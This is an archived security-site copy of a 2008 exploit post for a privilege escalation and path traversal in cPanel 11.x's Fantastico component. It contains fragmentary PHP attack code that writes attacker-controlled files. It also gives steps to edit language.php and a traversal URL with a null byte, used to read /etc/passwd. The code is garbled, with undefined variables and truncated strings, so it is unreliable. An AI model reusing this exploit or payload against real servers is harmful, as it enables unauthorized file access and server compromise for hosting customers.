TUCoPS :: HP Unsorted C :: va1962.htm

Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"


Script : Cpanel 11.x
bug : language.php [edite file]
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

 safemode off , mod_security off  Disable functions :  All NONE ,access root folder 

www.arab4services.net 
# ##e-mail : l1un@hotmail.com , i-1@hotmail.com## 
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...
";
echo "coding by Super-Crystal 
";
echo "Cleaning up
";
echo "Done!
"; } else { echo "error : ".php_uname(); } } else { ?>

Deadly Script

Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

Exploit:
change
 " />

1- change /home/[user]/.fantasticodata/language.php
2- click on the submit
3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
Written: 10.10.2008
Public: 26.11.2008
Author : Super-Crystal
Arab4services.net">href="http://www.arab4services.net">Arab4services.net
arab4services.net

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH